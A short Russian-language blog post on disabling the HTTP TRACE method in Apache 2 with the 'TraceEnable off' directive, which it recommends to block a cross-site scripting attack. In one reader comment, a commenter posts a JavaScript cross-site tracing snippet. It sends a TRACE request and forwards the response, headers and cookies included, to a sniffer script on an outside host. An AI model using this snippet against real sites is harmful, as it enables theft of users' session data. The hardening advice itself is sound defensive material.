Запрет метода TRACE в протоколе HTTP Apache 2

Задача: запретить метода TRACE в протоколе HTTP. С помощью использования метода TRACE в протоколе HTTP возможно выполнение атаки межсайтовый скриптинг. http://www.cgisecurity.com/articles/xss-faq.shtml
Дано: Apache 2
Решение:
в httpd.conf установить директиву

 
TraceEnable off

Получать новые сообщения по Email

3 комментариев на “Запрет метода TRACE в протоколе HTTP Apache 2”

  1. prim_v пишет:

    как пользоваться таким методом? опишите пожалуйста подробно.

  2. Eugene Pikalov пишет:

    Например:
    function sendTrace () {
    var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    xmlHttp.open("TRACE", "http://forum.web-hack.ru",false);
    xmlHttp.send();
    window.location=("http://host/snif/snif.php?q="+xmlHttp.responseText)
    }

  3. Vasil пишет:

    а что делает пример?

Оставить комментарий